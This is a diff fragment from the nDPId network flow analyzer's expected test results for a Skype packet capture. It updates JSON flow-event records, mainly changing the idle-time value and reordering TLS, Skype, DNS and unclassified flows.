00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969657368,"flow_last_seen":1431969657368,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.25","src_port":13021,"dst_port":40028,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.160","src_port":13021,"dst_port":40028,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} @@ -1325,63 +1315,73 @@ 00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969685483,"flow_last_seen":1431969685483,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.12","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.44","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969681480,"flow_last_seen":1431969681480,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.16","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1431969791166,"flow_last_seen":1431969802183,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.53.51","src_port":50145,"dst_port":12350,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1431969791166,"flow_last_seen":1431969802183,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.53.51","src_port":50145,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00640{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969675055,"flow_last_seen":1431969696024,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":261,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.146","src_port":50056,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969675055,"flow_last_seen":1431969696024,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":261,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.146","src_port":50056,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969675055,"flow_last_seen":1431969694153,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":351,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.153","src_port":50057,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969675055,"flow_last_seen":1431969694153,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":351,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.153","src_port":50057,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969714398,"flow_last_seen":1431969731992,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":202,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":50114,"dst_port":31010,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969714398,"flow_last_seen":1431969731992,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":202,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":50114,"dst_port":31010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":31,"flow_first_seen":1431969715511,"flow_last_seen":1431969755484,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":2618,"flow_avg_l4_payload_len":84,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":50118,"dst_port":31010,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":31,"flow_first_seen":1431969715511,"flow_last_seen":1431969755484,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":2618,"flow_avg_l4_payload_len":84,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":50118,"dst_port":31010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00640{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969683081,"flow_last_seen":1431969710648,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":403,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.160","src_port":50069,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969683081,"flow_last_seen":1431969710648,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":403,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.160","src_port":50069,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969685111,"flow_last_seen":1431969703010,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":486,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.170","src_port":50072,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969685111,"flow_last_seen":1431969703010,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":486,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.170","src_port":50072,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1431969791166,"flow_last_seen":1431969802183,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.53.51","src_port":50145,"dst_port":12350,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1431969791166,"flow_last_seen":1431969802183,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.53.51","src_port":50145,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00639{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969658979,"flow_last_seen":1431969687310,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":571,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.170","src_port":50037,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969658979,"flow_last_seen":1431969687310,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":571,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.170","src_port":50037,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00640{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969664990,"flow_last_seen":1431969683864,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":413,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.167","src_port":50045,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969664990,"flow_last_seen":1431969683864,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":413,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.167","src_port":50045,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969667019,"flow_last_seen":1431969685356,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":347,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.150","src_port":50048,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969667019,"flow_last_seen":1431969685356,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":347,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.150","src_port":50048,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969669039,"flow_last_seen":1431969688720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":353,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.166","src_port":50051,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969669039,"flow_last_seen":1431969688720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":353,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.166","src_port":50051,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00640{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969675055,"flow_last_seen":1431969696024,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":261,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.146","src_port":50056,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969675055,"flow_last_seen":1431969696024,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":261,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.146","src_port":50056,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969675055,"flow_last_seen":1431969694153,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":351,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.153","src_port":50057,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969675055,"flow_last_seen":1431969694153,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":351,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.153","src_port":50057,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969714398,"flow_last_seen":1431969731992,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":202,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":50114,"dst_port":31010,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969714398,"flow_last_seen":1431969731992,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":202,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":50114,"dst_port":31010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":31,"flow_first_seen":1431969715511,"flow_last_seen":1431969755484,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":2618,"flow_avg_l4_payload_len":84,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":50118,"dst_port":31010,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":31,"flow_first_seen":1431969715511,"flow_last_seen":1431969755484,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":2618,"flow_avg_l4_payload_len":84,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":50118,"dst_port":31010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00640{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969683081,"flow_last_seen":1431969710648,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":403,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.160","src_port":50069,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969683081,"flow_last_seen":1431969710648,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":403,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.160","src_port":50069,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969685111,"flow_last_seen":1431969703010,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":486,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.170","src_port":50072,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969685111,"flow_last_seen":1431969703010,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":486,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.170","src_port":50072,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969719055,"flow_last_seen":1431969719110,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":62454,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"}} -00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969691076,"flow_last_seen":1431969709588,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":326,"flow_avg_l4_payload_len":21,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.173","src_port":50078,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969691076,"flow_last_seen":1431969709588,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":326,"flow_avg_l4_payload_len":21,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.173","src_port":50078,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969691076,"flow_last_seen":1431969708230,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":536,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.156","src_port":50080,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 